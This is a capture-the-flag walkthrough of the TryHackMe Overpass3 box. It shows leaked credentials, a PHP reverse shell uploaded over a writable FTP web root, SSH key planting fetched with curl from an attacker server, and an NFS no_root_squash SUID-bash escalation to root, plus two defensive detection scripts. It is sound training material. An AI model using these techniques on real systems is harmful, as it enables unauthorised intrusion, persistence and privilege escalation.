TryHackMe - Overpass3
Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 17:50 EDT
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.32% done; ETC: 17:55 (0:00:20 remaining)
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
Not shown: 65235 filtered tcp ports (no-response), 297 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 5.4 (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.52 seconds
Gobuster
If we go to the website there is nothing specific visible, so we can run gobuster to check for hidden directories.
There is a backups page where we can find a backup.zip file. The zip is easily extracted (it is not password protected). In it we find:
A PGP private key
An Excel file, CustomerDetails.xlsx.gpg
Decrypt the xlsx
According to this doc it can be decrypted in one command, but first we need to import the private key with
gpg --import priv.key
And then we can decrypt the file:
Once decrypted, the file can be opened with LibreOffice (if, like me, you do not have Microsoft Excel ;) ).
And we get this
So we have usernames and passwords:
paradox ShibesAreGreat123
0day OllieIsTheBestDog
muirlandoracle A11D0gsAreAw3s0me
We can put the usernames and the passwords in two separate files for later use.
FTP
Let's see if we can use those to connect through FTP. (Note: I tried with SSH, but password authentication is not supported.)
Using hydra we have a hit!
So we can connect to the FTP server using the creds paradox:ShibesAreGreat123
It seems this FTP directory is the one used to serve the website. We have write permission, so we can try to get RCE this way.
As it is Apache we can try to use a PHP reverse shell. Let's take the one from pentestmonkey.
We modify the IP address and port as we wish.
We set up our listener:
rlwrap nc -lvp 1234
(rlwrap will give us a more interactive shell, which is pretty convenient.)
We put our reverse shell on the FTP server.
And now we can navigate to our shell using our browser:
http://10.10.4.129/php-reverse-shell.php
We get a shell!!
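From the defender's side, the weak point above is an FTP account that can write into the Apache document root. As an added example (not from the original writeup), here is a small scanner that flags PHP files under a web root which call process-spawning or raw-socket functions, one way to catch a dropped shell like the one uploaded here. The function list is a heuristic I chose, and the sample web root is constructed inline.

```python
import re

# Functions a PHP page on a static hosting site has no business calling:
# process spawning and raw sockets are exactly what a reverse shell needs.
# (Heuristic list chosen for this example, not a complete catalogue.)
SUSPICIOUS_CALLS = ("proc_open", "shell_exec", "passthru", "popen",
                    "exec", "system", "fsockopen")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(",
                     re.IGNORECASE)

def scan_php_source(name, source):
    """Return the sorted list of suspicious calls found in one PHP file
    (non-PHP files are skipped, since Apache will not execute them)."""
    if not name.lower().endswith((".php", ".phtml", ".phar")):
        return []
    return sorted({m.group(1).lower() for m in CALL_RE.finditer(source)})

def scan_webroot(files):
    """files: mapping of relative path -> source text. On a real host you
    would read them from the DocumentRoot; here they are constructed."""
    findings = {}
    for name, src in files.items():
        hits = scan_php_source(name, src)
        if hits:
            findings[name] = hits
    return findings

# Constructed sample web root: two legitimate pages and one dropped shell.
SAMPLE_WEBROOT = {
    "index.html": "<html><body>Overpass Hosting</body></html>",
    "contact.php": "<?php echo htmlspecialchars($_GET['name'] ?? ''); ?>",
    "php-reverse-shell.php":
        "<?php $sock = fsockopen($ip, $port); "
        "$p = proc_open($shell, $desc, $pipes); ?>",
}

if __name__ == "__main__":
    for path, hits in scan_webroot(SAMPLE_WEBROOT).items():
        print(f"{path}: {', '.join(hits)}")
```

On a live host the same check pairs well with a file-integrity monitor on the document root, since a legitimate static site should never gain new .php files at all.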
Let's use the command find to find a flag
find / -name "*flag*" 2>/dev/null
There is one here: /usr/share/httpd/web.flag
We have the web flag.
We could try the passwords we got previously with the su command.
Let's try with james: we get a failure with all three passwords. Let's try with paradox: it works with the password ShibesAreGreat123.
If we ls -al the home directory we have an authorized_keys file for paradox, so we could replace it with our own public key to have a more stable shell. Let's generate an RSA key pair.
Now we just need to replace the authorized_keys file with our public key. First we copy our public key into an authorized_keys file:
cp private.pub authorized_keys
Then we launch an HTTP server:
python3 -m http.server 80
wget does not work on our target, so we can use curl instead:
curl http://10.13.22.56/authorized_keys --output authorized_keys
And now the authorized_keys file contains our public key.
Now we can just connect this way:
ssh -i private paradox@10.10.4.129
Let's get linpeas on the machine to enumerate our way to root.
We get linpeas on our machine:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
We launch a Python HTTP server:
python3 -m http.server 80
We get it on our target using curl:
curl http://10.13.22.56/linpeas_linux_amd64 --output linpeas
We make it executable:
chmod +x linpeas
We launch it:
./linpeas
There is a recent CVE:
CVE-2021-4034
But there is also this, which seems interesting as linpeas highlights it as a 95% PE vector.
Let's have a look at this documentation from HackTricks.
We are not able to mount the share, so we need to check how NFS is running:
We could try to port forward:
ssh paradox@10.10.4.129 -i private -L 2049:localhost:2049
and then mount the share.
We now have access to the user flag, and we also have the .ssh folder of james, so we can use it to log in as james.
It works.
Let's try to go further with the NFS misconfiguration.
On our attacking machine we run
From our shell as james we can now run
So we get this error; we probably need another bash binary. Let's try with the one from the target machine.
We copy it using scp to our attacking machine:
scp -i .ssh/id_rsa james@10.10.4.129:/bin/bash .
Let's redo our chmod +s:
chmod +s bash
We just need to run
./bash -p
and it works!
(In fact I accidentally typed ./bash at first, but then retyping ./bash -p did the trick.)
We can get the root flag:
bash-4.4# cat /root/root.flag
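The NFS path to root above only works because the export does not squash root, so a client root can drop a root-owned SUID bash on the share. As an added defensive example (not from the original writeup), this script audits an exports(5)-style file for no_root_squash, insecure and world-writable exports; the sample file is constructed, not the box's real /etc/exports.

```python
import re

# Options that weaken an NFS export. no_root_squash keeps a remote uid 0 as
# uid 0, so a client root can create root-owned SUID binaries on the share;
# insecure accepts requests from unprivileged client source ports.
RISKY = {
    "no_root_squash": "remote root is not mapped to nobody",
    "insecure": "requests from unprivileged client ports are accepted",
    "world_rw": "share is writable by any host (*)",
}
# A client spec is either  host(opt,opt)  or a bare  host  with default options.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")

def parse_exports(text):
    """Parse exports(5)-style text into (path, client, options) tuples.
    Handles '#' comments and backslash line continuation; the old '-opts'
    general-option syntax is not handled (an assumption of this example)."""
    entries = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        for m in CLIENT_RE.finditer(rest):
            if m.group(3):                      # bare client: default options
                entries.append((path, m.group(3), set()))
            else:
                opts = {o.strip() for o in m.group(2).split(",") if o.strip()}
                entries.append((path, m.group(1), opts))
    return entries

def audit_exports(text):
    """Return [(path, client, [issue codes])] for every risky export entry."""
    findings = []
    for path, client, opts in parse_exports(text):
        issues = [o for o in ("no_root_squash", "insecure") if o in opts]
        if client == "*" and "rw" in opts:
            issues.append("world_rw")
        if issues:
            findings.append((path, client, issues))
    return findings

# Constructed sample /etc/exports, not the file from the box.
SAMPLE_EXPORTS = """\
# home directory exported to everyone with root squashing disabled
/home/james *(rw,sync,no_root_squash)
/srv/public 10.10.0.0/16(ro,sync) \\
            192.168.1.5(rw,root_squash)
"""

if __name__ == "__main__":
    for path, client, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: " + "; ".join(RISKY[i] for i in issues))
```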